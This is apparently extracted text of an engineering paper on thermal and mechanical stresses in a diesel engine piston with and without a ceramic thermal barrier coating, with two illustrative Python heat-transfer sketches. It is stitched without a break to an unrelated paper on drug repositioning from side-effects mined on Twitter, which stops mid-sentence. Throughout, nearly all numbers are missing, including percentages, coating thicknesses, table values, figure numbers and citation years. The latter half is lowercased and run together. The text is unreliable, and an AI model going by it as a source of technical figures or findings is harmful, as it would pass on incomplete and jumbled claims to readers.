&doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= 
Mechanical and Thermal Stresses Analysis in Diesel Engine Piston with and without Different Thermal Coating Layer on Piston Head

Nabeel Abdulhadi Ghyadh, Maher A.R. Sadiq Al-Baghdadi and Sahib Shihab Ahmed
Department of Mechanical Engineering, Faculty of Engineering, University of Kufa, Ministry of Higher Education and Scientific Research, Iraq
Email: sahib.aldulaimi@uokufa.edu.iq, nabeel.ghayadh@uokufa.edu.iq, mahirar.albaghdadi@uokufa.edu.iq

Abstract. The main goal of this paper is to compare the behaviour of the piston with and without a thermal coating layer on the piston head under the thermal and mechanical loads that arise in the piston during operation. A three-dimensional model of a heavy diesel engine piston is presented. The governing equations have been discretized using a finite-volume method (FVM) and solved using the COMSOL Multiphysics package. The results of the numerical model show the distribution of temperature, temperature gradients, von Mises stresses, and displacement in the diesel engine piston with and without a µm-thick thermal coating layer of La-Zr-O ceramic, which has low thermal conductivity. The results show a marked improvement in the performance of the piston with the thermal coating layer.

Keywords: diesel engine piston, thermal analysis, thermal barrier coating, 3D finite volume method.

Introduction
In internal combustion engines, parts such as the cylinder head, cylinder liner, piston and valves are among the most heavily thermally loaded components because they are in direct contact with the flame; as a consequence, they lose strength and deform slightly from their original state. It therefore becomes important to calculate the piston stress distribution in order to keep the deformations within acceptable levels. The stress distribution enables the designer to optimize the thermal aspects of the piston design at lower cost. The mechanical and
thermal stress levels depend on the temperature distribution in the parts, the thermal expansion coefficient, Young's modulus of elasticity, the thermal load, the design of the parts, and the cooling conditions [ , ]. The diesel engine is undergoing continuous technological progression towards an adiabatic engine, with improvements in the performance and durability of the IC engine. A major breakthrough in diesel engine technology to make it adiabatic can be achieved by coating the various parts, such as the cylinder wall, combustion chamber, cylinder head, piston body and valves, with ceramic materials having very low thermal conductivity [ ]. The coating material of an adiabatic engine must have high temperature resistance, a low thermal expansion coefficient, low friction characteristics, good thermal shock resistance, high strain tolerance, a low sintering rate of the porous microstructure, light weight, and durability [ , ]. Ceramic-coated pistons have been widely used in internal combustion engines; the ceramic coating acts as an insulating layer that reduces much of the heat loss of the engine and yields higher efficiency [ ]. The application of thermal barrier coatings on the diesel engine piston head reduces the heat loss to the engine cooling jacket through the surfaces exposed to heat transfer, such as the cylinder head, liner, piston crown and piston rings. It is important to calculate the piston temperature distribution in order to keep the thermal stresses and deformations within acceptable levels [ ]. In the past two decades, much attention has been paid to the study of 'adiabatic' or 'low heat rejection' engines; these studies have commonly been performed on diesel engines [ ]. Uzun et al. [ ] carried out an experimental investigation into the effects of ceramic coatings on the performance and exhaust emissions of a diesel engine. Ceramic coatings can eliminate visible smoke, inhibit the formation of NOx, reduce CO and particulate emissions, and improve combustion efficiency. The performance of the ceramic-coated diesel engine was tested on a hydraulic engine dynamometer, and the coatings were evaluated for their ability to control particulate emissions, as well as for exhaust-gas emissions, smoke, horsepower, speed and fuel rate; CO and hydrocarbon levels were lower than baseline levels. Buyukkaya and Cerit [ ] performed thermal analyses on a conventional (uncoated) diesel piston made of aluminium-silicon alloy and steel, and on pistons coated with an MgO-ZrO material, using the commercial code ANSYS. The results for the four different pistons were compared with each other, and the effects of the coatings on the thermal behaviour of the pistons were investigated. It was shown that the maximum surface temperature of the piston coated with the low-thermal-conductivity material was improved by approximately % for the AlSi alloy and % for the steel. Bhagat and Jibhakate [ ] described the stress distribution due to seizure on a four-stroke engine piston using FEA. The finite element analysis was performed using computer-aided design (CAD) software, with the main objective of investigating and analysing the thermal stress distribution of the piston under real engine conditions during the combustion process. Their paper describes mesh optimization using the finite element analysis technique to predict the regions of higher stress and the critical regions on the component.
The optimization was carried out to reduce the stress concentration on the upper end of the piston, i.e., the piston head/crown, piston skirt and sleeve. The structural model of the piston was developed using computer-aided design (CAD) with the Pro/ENGINEER software, and the finite element analysis was then performed using ANSYS. Rakopoulos and Mavropoulos [ ] used a piston model for the calculation of the temperature field and heat flow field under steady and transient engine operating conditions. Three-dimensional finite element analyses were implemented to represent the complex geometry of the metal components, and a satisfactory degree of agreement between theoretical predictions and experimental measurements was found. Muhammet Cerit [ ] determined the temperature and stress distributions in a partially ceramic-coated spark ignition (SI) engine piston. The effects of coating thickness and width on the temperature and stress distributions were investigated, including comparisons with results from an uncoated piston. It was observed that the coating surface temperature increases with increasing thickness at a decreasing rate; the surface temperature of the piston with a . mm coating thickness was increased by up to °C. The normal stress on the coated surface decreases with coating thickness up to approximately mm, at which the stress value is a minimum; however, it rises again when the coating thickness exceeds mm. As for the bond coat surface, with increasing coating thickness the normal stress decreases steadily while the maximum shear stress rises at a decreasing rate. The optimum coating thickness was found to be near mm under the given conditions. Li [ ] used a three-dimensional finite element model of an aluminium diesel engine piston to calculate operating temperatures, and showed that skirt contours played an important part in the reduction of scuffing and friction. Prasad et al. [ ] used a thermally insulating material, namely partially stabilized zirconia (PSZ), on the piston crown face and reported a % reduction in heat loss through the piston. Pierz [ ] investigated thermal barrier coating development for a diesel engine aluminium piston; based on the predicted temperatures and stresses on the piston, together with material strength information, the primary cause of coating failure was proposed to be low-cycle fatigue resulting from localized yielding when the coating is hot and in compression. The main scope of this work is to reduce the mechanical and thermal stress levels, which depend on the temperature distribution in the piston, and to increase the life span of the coated pistons of the engine using thermal barrier coating (TBC) technology. The best performance can be obtained by combining the chosen materials so that their individual properties act together.

Numerical model
A three-dimensional finite volume method (FVM) model of a diesel engine piston is presented. The model accounts for the mechanical and thermal loads that arise in the engine piston during its operation. The geometry of the piston is shown in Figure ; the piston sits on the connecting rod with the crankshaft.

Figure . Geometry of the diesel engine piston.
Computational domain
A computational model of an entire diesel engine piston would require very large computing resources and excessively long simulation times. The computational domain in this study is therefore limited to a sector of the cylindrical geometry of the piston. The three-dimensional computational domain of the diesel engine piston used in the model is shown in Figure .

Figure . Three-dimensional computational domain of the diesel engine piston.

Modelling equations
The prediction of the temperature distribution in the diesel engine piston involves the solution of the heat transfer equation, i.e., heat conduction and heat convection with the appropriate boundary conditions. The heat transfer in the diesel engine piston is governed by [ ]

\rho C_p \frac{\partial T}{\partial t} + \rho C_p \mathbf{u}\cdot\nabla T = \nabla\cdot\left(k\,\nabla T\right) + Q

where \rho is the density [kg/m³], C_p is the heat capacity [kJ/kg·K], k is the thermal conductivity [W/m·K], \mathbf{u} is the velocity vector [m/s], and Q is the heat source [W]. The diesel engine piston is subjected to the pressure force of the hot gases, as shown in Figures and . The heat transfer coefficient at the diesel engine piston head is calculated using an empirical correlation [ ] expressed in terms of h_g, the heat transfer coefficient [W/m²·K], p_g, the gas pressure [Pa], T_g, the gas temperature [K], v_p, the mean piston speed [m/s], B, the piston bore [mm], and \theta, the crank shaft angle [degree]. Because of the high variation of the temperature and pressure inside the combustion chamber during the engine cycle, the resulting gas temperature (T_{gr}) and the mean heat transfer coefficient (h_{gm}) are calculated by averaging over the engine cycle [ ]. Mechanical and thermal stresses are analysed using the standard linear thermo-elastic (von Mises) relations [ ]. The thermal strains resulting from a change in temperature of an unconstrained isotropic volume are given by [ ]

\varepsilon_{th} = \alpha\,(T - T_{ref})

where \alpha is the thermal expansion coefficient [1/K] and T_{ref} is the reference temperature. The analysis was performed under the worst thermal loading condition of rated power. The engine specification and operating conditions are summarized in Table .

Table . Engine specifications and operating conditions.
Parameter | Value
Piston bore [mm] |
Connecting rod [mm] |
Cylinder number |
Intake valve number |
Exhaust valve number |
Compression ratio |
Valve lift [mm] |
Engine speed [rpm] |
Air-fuel ratio |
Power [hp] |
Piston stroke [mm] |
Mean piston speed [m/s] |

Figure . Diagram of measured gas pressure in the cylinder.
Figure . Diagram of measured gas temperature in the cylinder.

Computational procedure
The governing equations were discretized using a finite-volume method and solved using the COMSOL Multiphysics package. Stringent numerical tests were performed to ensure that the solutions were independent of the grid size. A quadratic computational mesh consisting of domain elements, boundary elements, and edge elements was found to provide sufficient spatial resolution (Figure ). In addition to the heat transfer boundary conditions, the mechanical boundary conditions were applied as shown in Table . The coupled set of equations was solved iteratively, and the solution was considered convergent when the relative error in each field between two consecutive iterations fell below the prescribed tolerance.
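To make the role of the coating's low thermal conductivity concrete, the following minimal Python sketch evaluates a one-dimensional, steady-state thermal-resistance model of the piston crown with and without a thin ceramic layer. All temperatures, convection coefficients, thicknesses, and conductivities in the sketch are illustrative assumptions, not values taken from this study.

```python
# Minimal 1D steady-state thermal-resistance model of a piston crown,
# with and without a thin ceramic thermal barrier coating (TBC).
# All numbers below are illustrative assumptions, not values from the paper.

def crown_temperatures(coated: bool):
    # Assumed boundary conditions
    T_gas, T_oil = 900.0, 380.0          # combustion gas / oil-side temperatures [K]
    h_gas, h_oil = 600.0, 1500.0         # convection coefficients [W/m^2.K]

    # Assumed layer properties
    t_alu, k_alu = 0.010, 155.0          # aluminium crown: thickness [m], conductivity [W/m.K]
    t_tbc, k_tbc = 400e-6, 1.5           # ceramic coating: 400 um, low conductivity

    # Series thermal resistances per unit area [m^2.K/W]
    R = 1.0 / h_gas
    if coated:
        R += t_tbc / k_tbc
    R_gas_to_metal = R                   # resistance from gas to the metal surface
    R += t_alu / k_alu + 1.0 / h_oil

    q = (T_gas - T_oil) / R              # steady heat flux [W/m^2]
    T_metal_surface = T_gas - q * R_gas_to_metal
    return q, T_metal_surface

for coated in (False, True):
    q, T_m = crown_temperatures(coated)
    label = "coated  " if coated else "uncoated"
    print(f"{label}: heat flux = {q:8.0f} W/m^2, metal surface T = {T_m:6.1f} K")
```

Even this crude series-resistance balance reproduces the qualitative trend reported below: the low-conductivity layer reduces the heat flux entering the piston and lowers the metal surface temperature, which in turn limits the temperature gradients and von Mises stresses in the substrate.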
mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head international journal of advanced network monitoring and controls year , no. figure. computational mesh of the computational domain. table boundary conditions mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head international journal of advanced network monitoring and controls year , no. . . comparing with real damage cases the results of the numerical model are showing the temperature gradients in the diesel engine piston. the maximum values of the temperature gradients appear around the piston head and also occur in the rings grooves. this leads to develop and increase of the maximum thermal stress, and as a result, it contributes to the formation of microcracks. at the worst conditions for the cooling of the piston such as distortion of the piston head, this stress causes radial cracks at the edge of the piston. in addition, microcracks lead to loss in material of the piston and consequently to its defects. examples of damage of the diesel engine piston shows in figure with good similarity to the numerical model. . effect of the coated layer on the piston performance in addition to revealing the detail of mechanical and thermal phenomena inside the engine piston, the comprehensive three-dimensional model can also be used to investigate the sensitivity of certain parameters on piston performance. the validated model is now ready for studying the effects of the coating of the top surface of the piston with different types of thermal barrier coatings material on the piston performance. the performance characteristics of the engine piston based on a certain parameter can be obtained by varying that parameter (material properties of the coated layer) while keeping all other parameters constant at base case conditions. results obtained from these parametric studies will allow the identification of the critical parameters for piston performance as well as the sensitivity of the model to these parameters. the top surface of the piston head is coated with µm thickness of various thermal barrier materials (figure ). material properties of each coated layer are shown in table . table material properties of the coated layer on the top surface of the piston figure. visual comparison between the result of the numerical model and examples of the real damage pistons. mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head international journal of advanced network monitoring and controls year , no. figure. thermal barrier material coated layer on the top surface of the piston head. . results results obtained from the mechanical and thermal phenomena inside the engine piston analyses by the finite volume technique, the temperature and stress variations for the uncoated top surface of the piston and coated top surface of the piston by the ceramic material are discussed systematically. for thermal barrier coatings in an engine, heat conduction is generally more dominant than radiation; hence, the thermal conductivity of material is very important for estimating temperature distributions and heat flows. the temperature distribution of the piston without and with coating layer is shown in figure . 
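The parametric study just described varies the material properties of the coated layer while keeping all other parameters at base-case conditions. A minimal way to explore the same sensitivity outside the full FVM model is to sweep the coating conductivity in the simple one-dimensional resistance balance sketched earlier; the candidate conductivity values and all other numbers below are illustrative placeholders and do not correspond to the materials listed in the paper's table.

```python
# Illustrative sensitivity sweep: vary the coating thermal conductivity and
# observe the steady heat flux and the coating/metal interface temperature.
# All property values are assumptions, not those of the coatings studied here.

T_gas, T_oil = 900.0, 380.0        # assumed boundary temperatures [K]
h_gas, h_oil = 600.0, 1500.0       # assumed convection coefficients [W/m^2.K]
t_alu, k_alu = 0.010, 155.0        # aluminium crown thickness [m] and conductivity [W/m.K]
t_tbc = 400e-6                     # coating thickness [m]

for k_tbc in (0.8, 1.5, 3.0, 10.0):        # candidate coating conductivities [W/m.K]
    R_gas = 1.0 / h_gas
    R_tbc = t_tbc / k_tbc
    R_total = R_gas + R_tbc + t_alu / k_alu + 1.0 / h_oil
    q = (T_gas - T_oil) / R_total          # steady heat flux [W/m^2]
    T_metal = T_gas - q * (R_gas + R_tbc)  # temperature at the coating/metal interface
    print(f"k_tbc = {k_tbc:5.1f} W/m.K -> q = {q:8.0f} W/m^2, interface T = {T_metal:6.1f} K")
```

Lower conductivities give a larger temperature drop across the coating and a cooler substrate, which is consistent with the reduced gradients and stresses reported for the coated piston.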
as expected, the high temperatures are observed at the crown center and bowl lip areas, since it is subjected to the heat flux circumferentially. the maximum temperature is at the center and the minimum is at the bottom of the crown bowl on the piston top surface. in the radial direction, the temperature decreases from the crown center to the bottom of the bowl, then it increases towards the bowl lips and finally decreases again at the edge of the crown surface. von-mises stress distributions versus distance for uncoated and coated top piston surfaces are shown in figure . in the coating case, the von-mises stress distributions decreases due to decreasing in the thermal conductivity of the ceramic material. temperature gradients distribution for uncoated and coated pistons on the top piston surfaces are shown in figure . the maximum values of the temperature gradients appear around the piston head and also occur in the rings grooves. this leads to develop and increase of the maximum thermal stress, and as a result, this stress causes radial cracks at the edge of the piston. by using coating layer on the top piston surfaces, the temperature gradients distribution has been decreased due to the low thermal conductivity of the ceramic material and this leads to reduce failure in the piston. figure shows displacement distribution of the standard piston and coated pistons. ceramic coating material has a low heat transfer coefficient and this reduce the displacement in the piston. figure. temperature distribution of the engine piston [oc] without (upper) and with (lower) coating layer on the top surface of the piston head. mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head international journal of advanced network monitoring and controls year , no. figure. von-mises stress distribution of the engine piston [mpa] without (upper) and with (lower) coating layer on the top surface of the piston head. figure. temperature gradients distribution of the engine piston [k/mm] without (upper) and with (lower) coating layer on the top surface of the piston head. mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head international journal of advanced network monitoring and controls year , no. figure. displacement distribution of the engine piston [mm] without (upper) and with (lower) coating layer on the top surface of the piston head. . conclusion the purpose of this work was to compare the behaviour of the piston without and with coating layer on the top of piston under thermal and mechanical loads. the obtained results shows that the thermal and mechanical stresses induced in piston with coating layer are less as compare to the piston without coating layer. the coating material has been applied successfully to the engine piston as the thermal barrier coating of a diesel engine prevents excessive heat loss during combustion. through the analysis, it is concluded that the main factor influencing the piston intensity is the temperature, thus providing basis for the optimization design of the piston. the stress and the deformation of the piston are mainly determined by the temperature, so it is necessary to decrease the piston temperature through structure improvement. the results of the numerical model are showing the temperature gradients in the diesel engine piston. 
the maximum values of the temperature gradients appear around the piston head and also occur in the rings grooves. this leads to develop and increase of the maximum thermal stress, and as a result, it contributes to the formation of micro cracks. it is important to calculate the piston temperature distribution in order to control the thermal stresses and deformations within acceptable levels. references [ ] subodh kumar sharma , p. k. saini and n. k. samria. thermo–mechanical analysis of av diesel engine piston using fem . journal of advanced engineering research issn: - volume , issue , , pp. - . [ ] rr.sekar and r. kamo. advanced adiabatic diesel engine for passenger cars. sae paper . [ ] pawar, a., jajoo, b., and nandagoankar, m. combustion analysis and performance of low heat rejection diesel engine with different thermal insulation coating, sae technical paper: , . [ ] hui dai, xinghuazhong, jiayan li and et al. surface & coatings technology, , – . [ ] bin zhao. thermal stress analysis of ceramic-coated diesel engine pistons based on the wavelet finite-element method. american society of civil engineers, . [ ] k. sridhar, r. reji kumar and m. narasimha. thermal barrier analysis in diesel. international journal of modern engineering research (ijmer), vol. , issue. , may-june. pp- - . [ ] v. gnanamoorthi and g. devaradjane. the effect of thermal barrier coating material in ci engine using higher fraction ethanol diesel blend. journal of chemical and pharmaceutical research, , ( ): - . [ ] abdullah uzun , i˙smet c evik and mustafa akc,il. effects of thermal barrier coating on a turbocharged diesel engine performance. surface and coatings technology – ( ) – . [ ] ekrem buyukkaya and muhammet cerit. thermal analysis of a ceramic coating diesel engine piston using -d finite element method. surface & coatings technology ( ) – . [ ] a. r. bhagat and y. m. jibhakate . thermal analysis and optimization of i.c. engine piston using finite element method. international journal of modern engineering research (ijmer), vol. , issue. , july-aug pp- - . [ ] c.d. rakopoulos and g.c. mavropoulos, study of the steady and transient temperature field and heat flow in the combustion chamber components of a medium speed diesel engine using finite element analyses, international journal of energy research, ( ), , - . [ ] muhammet cerit. thermo mechanical analysis of a partially ceramic coated piston used in an si engine. surface & coatings technology ( ) – . [ ] c.h. li, thermoelastic behavior of an aluminium diesel engine piston, general motors research labs, warren, sae paper , . [ ] r. prasad, n.k. samria, comput. struct. ( ) ( ) . [ ]. p.m. pierz, ( ) thermal barrier coating development for diesel engine aluminium pistons. [ ] maher a.r. sadiq al-baghdadi. applications of computational fluid dynamics and finite element methods in engineering education. international energy and environment foundation , isbn: . [ ] muhammet cerit, mehmet coban. temperature and thermal stress analyses of a ceramic-coated aluminum alloy piston used in a diesel engine. international journal of thermal sciences , , pp. - . 
mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head computational drug repositioning based on side-effects mined from social media submitted september accepted january published february corresponding author timothy nugent, timnugent@gmail.com, tim.nugent@thomsonreuters.com academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright nugent et al. distributed under creative commons cc-by . open access computational drug repositioning based on side-effects mined from social media timothy nugent, vassilis plachouras and jochen l. leidner thomson reuters, corporate research and development, london, united kingdom abstract drug repositioning methods attempt to identify novel therapeutic indications for marketed drugs. strategies include the use of side-effects to assign new disease indications, based on the premise that both therapeutic effects and side-effects are measurable physiological changes resulting from drug intervention. drugs with similar side-effects might share a common mechanism of action linking side-effects with disease treatment, or may serve as a treatment by “rescuing” a disease phenotype on the basis of their side-effects; therefore it may be possible to infer new indications based on the similarity of side-effect profiles. while existing methods leverage side-effect data from clinical studies and drug labels, evidence suggests this information is often incomplete due to under-reporting. here, we describe a novel computational method that uses side-effect data mined from social media to generate a sparse undirected graphical model using inverse covariance estimation with ℓ -norm regularization. results show that known indications are well recovered while current trial indications can also be identified, suggesting that sparse graphical models generated using side-effect data mined from social media may be useful for computational drug repositioning. subjects bioinformatics, data mining and machine learning, computational biology, social computing keywords drug repositioning, drug repurposing, side-effect, adverse drug reaction, social media, graphical model, graphical lasso, inverse covariance estimation introduction drug repositioning is the process of identifying novel therapeutic indications for marketed drugs. compared to traditional drug development, repositioned drugs have the advantage of decreased development time and costs given that significant pharmacokinetic, toxicology and safety data will have already been accumulated, drastically reducing the risk of attrition during clinical trials. in addition to marketed drugs, it is estimated that drug libraries may contain upwards of , failed drugs that have the potential to be repositioned, with this number increasing at a rate of – compounds per year (jarvis, ). repositioning of marketed or failed drugs has opened up new sources of revenue for pharmaceutical companies with estimates suggesting the market could generate multi-billion dollar annual sales in coming years (thomson reuters, ; tobinick, ). while many of the current successes of drug repositioning have come about through serendipitous clinical observations, systematic data-driven approaches are now showing increasing promise given their ability to generate repositioning hypotheses how to cite this article nugent et al. ( ), computational drug repositioning based on side-effects mined from social media. peerj comput. sci. 
:e ; doi . /peerj-cs. mailto:timnugent@gmail.com mailto:tim.nugent@thomsonreuters.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. for multiple drugs and diseases simultaneously using a wide range of data sources, while also incorporating prioritisation information to further accelerate development time (hurle et al., ). existing computational repositioning strategies generally use similar approaches but attempt to link different concepts. they include the use of transcriptomics methods which compare drug response gene-expression with disease gene-expression signatures (lamb et al., ; hu & agarwal, ; iorio et al., ; sirota et al., ; dudley et al., ), genetics-based methods which connect a known drug target with a genetically associated phenotype (franke et al., ; zhang et al., ; wang & zhang, ; sanseau et al., ; wang et al., ), network-based methods which link drugs or diseases in a network based on shared features (krauthammer et al., ; barabasi, gulbahce & loscalzo, ; kohler et al., ; vanunu et al., ; emig et al., ), and methods that use side-effect similarity to infer novel indications (campillos et al., ; yang & agarwal, ; zhang et al., ; cheng et al., ; bisgin et al., ; duran-frigola & aloy, ; wang et al., ; ye, liu & wei, ). drug side-effects can be attributed to a number of molecular interactions including on or off-target binding, drug–drug interactions (vilar et al., ; tatonetti et al., ), dose-dependent pharmacokinetics, metabolic activities, downstream pathway perturbations, aggregation effects, and irreversible target binding (xie et al., ; campillos et al., ). while side-effects are considered the unintended consequence of drug intervention, they can provide valuable insight into the physiological changes caused by the drug that are difficult to predict using pre-clinical or animal models. this relationship between drugs and side-effects has been exploited and used to identify shared target proteins between chemically dissimilar drugs, allowing new indications to be inferred based on the similarity of side-effect profiles (campillos et al., ). one rationale behind this and related approaches is that drugs sharing a significant number of side-effects might share a common mechanism of action linking side-effects with disease treatment—side-effects essentially become a phenotypic biomarker for a particular disease (yang & agarwal, ; duran-frigola & aloy, ). repositioned drugs can also be said to “rescue” a disease phenotype, on the basis of their side-effects; for example, drugs which cause hair growth as a side-effect can potentially be repositioned for the treatment of hair loss, while drugs which cause hypotension as a side-effect can be used to treat hypertension (yang & agarwal, ). 
examples of drugs successfully repositioned based on phenotypic rescue that have made it to market include exenatide, which was shown to cause significant weight loss as a side-effect of type diabetes treatment, leading to a trial of its therapeutic effect in non-diabetic obese subjects (buse et al., ; ladenheim, ), minoxidil which was originally developed for hypertension but found to cause hair growth as a side-effect, leading to its repositioning for the treatment of hair loss and androgenetic alopecia (shorter et al., ; li et al., ), and, perhaps most famously, sildenafil citrate which was repositioned while being studied for the primary indication of angina to the treatment of erectile dysfunction (ghofrani, osterloh & grimminger, ). existing repositioning methods based on side-effects, such as the work of campillos et al. ( ) and yang & agarwal ( ), have used data from the sider database (kuhn nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. et al., ), which contains side-effect data extracted from drug labels, largely collected from clinical trials during the pre-marketing phase of drug development. other resources include meyler’s side effects of drugs (aronson, ), which is updated annually in the side effects of drugs annual (ray, ), and the drugs@fda database (us food and drug administraction, ), while pharmacovigilance authorities attempt to detect, assess and monitor reported drug side-effects post-market. despite regular updates to these resources and voluntary reporting systems, there is evidence to suggest that side-effects are substantially under-reported, with some estimates indicating that up to % of adverse drug reactions go unreported for reasons that include lack of incentives, indifference, complacency, workload and lack of training among healthcare professionals (backstrom, mjorndal & dahlqvist, ; lopez-gonzalez, herdeiro & figueiras, ; hazell & shakir, ; tandon et al., ). side-effects reported from clinical trials also have limitations due to constraints on scale and time, as well as pharmacogenomic effects (evans & mcleod, ). a number of cancer drug studies have also observed that women are often significantly under-represented in clinical trials, making it difficult to study the efficacy, dosing and side-effects of treatments which can work differently in women and men; similar problems of under-representation also affect paediatrics, as many drugs are only ever tested on adults (jones, ). recently, efforts to mine user-generated content and social media for public-health issues and side-effects have shown promising performance, demonstrating correlations between the frequency of side-effects extracted from unlabelled data and the frequency of documented adverse drug reactions (leaman et al., ). despite this success, a number of significant natural language processing challenges remain. these include dealing with idiomatic expressions, linguistic variability of expression and creativity, ambiguous terminology, spelling errors, word shortenings, and distinguishing between the symptoms that a drug is treating and the side-effects it causes. 
some of the solutions proposed to deal with these issues include the use of specialist lexicons, appropriate use of semantic analysis, and improvements to approximate string matching, modeling of spelling errors, and contextual analysis surrounding the mentions of side-effects (leaman et al., ; segura- bedmar et al., ), while maintaining a list of symptoms for which a drug is prescribed can help to eliminate them from the list of side-effects identified (sampathkumar, chen & luo, ). although much of the focus has explored the use of online forums where users discuss their experience with pharmaceutical drugs and report side-effects (chee, berlin & schatz, ), the growing popularity of twitter ( ), which at the time of writing has over million active monthly users, provides a novel resource upon which to perform large-scale mining of reported drug side-effects in near real-time from the millions tweets posted daily (internet live stats, ). while only a small fraction of these daily tweets are related to health issues, the sheer volume of data available presents an opportunity to bridge the gap left by conventional side-effects reporting strategies. over time, the accumulation of side-effect data from social media may become comparable or even exceed the volume of traditional resources, and at the very least should be sufficient to nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. augment existing databases. additionally, the cost of running such a system continuously is relatively cheap compared to existing pharmacovigilance monitoring, presenting a compelling economic argument supporting the use of social media for such purposes. furthermore, the issues related to under-representation described above may be addressed. freifeld et al. ( ) presented a comparison study between drug side-effects found on twitter and adverse events reported in the fda adverse event reporting system (faers). starting with . million tweets, they used a set of drug names and a list of symptoms to reduce that data to a subset of , tweets. after manual examination, there were , tweets identified as mentioning a side-effect, with a spearman rank correlation found to be . . nikfarjam et al. ( ) introduce a method based on conditional random fields (crf) to tag mentions of drug side-effects in social media posts from twitter or the online health community dailystrength. they use features based on the context of tokens, a lexicon of adverse drug reactions, part-of-speech (pos) tags and a feature indicating whether a token is negated or not. they also used embedding clusters learned with word vec (mikolov et al., ). they reported an f score of . % for data from dailystrength and . % for twitter data. sarker & gonzalez ( ) developed classifiers to detect side-effects using training data from multiple sources, including tweets (ginn et al., ), dailystrength, and a corpus of adverse drug events obtained from medical case reports. they reported an f score of . % when training a support vector machine (svm) with radial basis function (rbf) kernel on all three datasets. recently, karimi et al. ( ) presented a survey of the field of surveillance for adverse drug events with automatic text and data mining techniques. in this study, we describe a drug repositioning methodology that uses side-effect data mined from social media to infer novel indications for marketed drugs. 
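One of the solutions mentioned above, approximate string matching of informal or misspelled side-effect mentions against a controlled vocabulary, can be illustrated with a few lines of standard-library Python. The toy lexicon and phrases below are invented for illustration and are not the CHV or SIDER vocabularies discussed in this work.

```python
# Minimal approximate matching of informal side-effect phrases to a lexicon.
# The lexicon and the example phrases are toy data, not the CHV vocabulary.
from difflib import get_close_matches

lexicon = ["headache", "nausea", "insomnia", "dizziness", "dry mouth", "weight gain"]

def map_to_lexicon(phrase: str, cutoff: float = 0.8):
    """Return the closest lexicon entry for a (possibly misspelled) phrase, or None."""
    matches = get_close_matches(phrase.lower(), lexicon, n=1, cutoff=cutoff)
    return matches[0] if matches else None

for raw in ["headachee", "dizzyness", "nauseous", "couldnt sleep"]:
    print(f"{raw!r:16} -> {map_to_lexicon(raw)}")
```

The last two examples deliberately fail to match, which mirrors the limitation noted in the text: simple string similarity does not capture colloquial or idiomatic descriptions, so production systems combine it with lexicon expansion, concept mapping, and contextual features.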
we use data from a pharmacovigilance system for mining twitter for drug side-effects (plachouras, leidner & garrow, under review). the system uses a set of cascading filters to eliminate large quantities of irrelevant messages and identify the most relevant data for further processing, before applying a svm classifier to identify tweets that mention suspected adverse drug reactions. using this data we apply sparse inverse covariance estimation to construct an undirected graphical model, which offers a way to describe the relationship between all drug pairs (meinshausen & bühlmann, ; friedman, hastie & tibshirani, ; banerjee, elghaoui & d’aspremont, ). this is achieved by solving a maximum likelihood problem using ℓ -norm regularization to make the resulting graph as sparse as possible, in order to generate the simplest graphical model which fully explains the data. results from testing the method on known and proposed trial indication recovery suggest that side-effect data mined from social media in combination with a regularized sparse graphical model can be used for systematic drug repositioning. methods mining twitter for drug side-effects we used the somedoses pharmacovigilance system (plachouras, leidner & garrow, under review) to extract reports of drug side-effects from twitter over a month period between nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. january and june . somedoses works by first applying topic filters to identify tweets that contain keywords related to drugs, before applying volume filters which remove tweets that are not written in english, are re-tweets or contain a hyperlink to a web page, since these posts are typically commercial offerings. side-effects were then mapped to an entry in the fda adverse event reporting system. tweets that pass these filters are then classified by a linear svm to distinguish those that mention a drug side-effect from those that do not. the svm classifier uses a number of natural language features including unigrams and bigrams, part-of-speech tags, sentiment scores, text surface features, and matches to gazetteers related to human body parts, side-effect synonyms, side-effect symptoms, causality indicators, clinical trials, medical professional roles, side effect-triggers and drugs. for each gazetteer, three features were created: a binary feature, which is set to if a tweet contains at least one sequence of tokens matching an entry from the gazetteer, the number of tokens matching entries from the gazetteer, and the fraction of characters in tokens matching entries from the gazetteer. for side-effect synonyms we used the consumer health vocabulary (chv) (zeng et al., ), which maps phrases to unified medical language system concept universal identifiers (cui) and partially addresses the issue of misspellings and informal language used to discuss medical issues in tweets. the matched cuis were also used as additional features. to develop the system, , tweets which passed the topic and volume filters were manually annotated as mentioning a side-effect or not, resulting in a cohen’s kappa for inter-annotator agreement on a sample of tweets annotated by two non-healthcare professional of . . using a time-based split of , tweets for training, , for development, and , for testing, the svm classifier that used all the features achieved a precision of . %, recall of . %, and f score of . % when evaluated using the , test tweets. 
this is statistically significantly higher than the results achieved by a linear svm classifier using only unigrams and bigrams as features (precision of . %, recall of . % and f score of . %). one of the sources of false negatives was the use of colloquial and indirect expressions by twitter users to express that they have experienced a side-effect. we also observed that a number of false positives discuss the efficacy of drugs rather than side-effects. twitter data over the month period, somedoses typically identified ∼ tweets per day that mentioned a drug side-effect, resulting in a data set of unique drugs and , unique side-effects from , tweets, once drugs with only a single side-effect were excluded and drug synonyms had been resolved to a common name using exact string matches to entries in world drug index (thomson reuters, b), which worked for approximately half of the data set with the remainder matched manually. we were also careful to remove indications that were falsely identified as side-effects using drug indications from cortellis clinical trials intelligence (thomson reuters, a). we used this data to construct a , row by column matrix of binary variables x, where x∈{ , }, indicating whether each drug was reported to cause each side-effect in the twitter data set. nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. calculating the sample covariance matrix using this data, we are able to form the sample covariance matrix s for binary variables as follows (allen, ), such that element si,j gives the 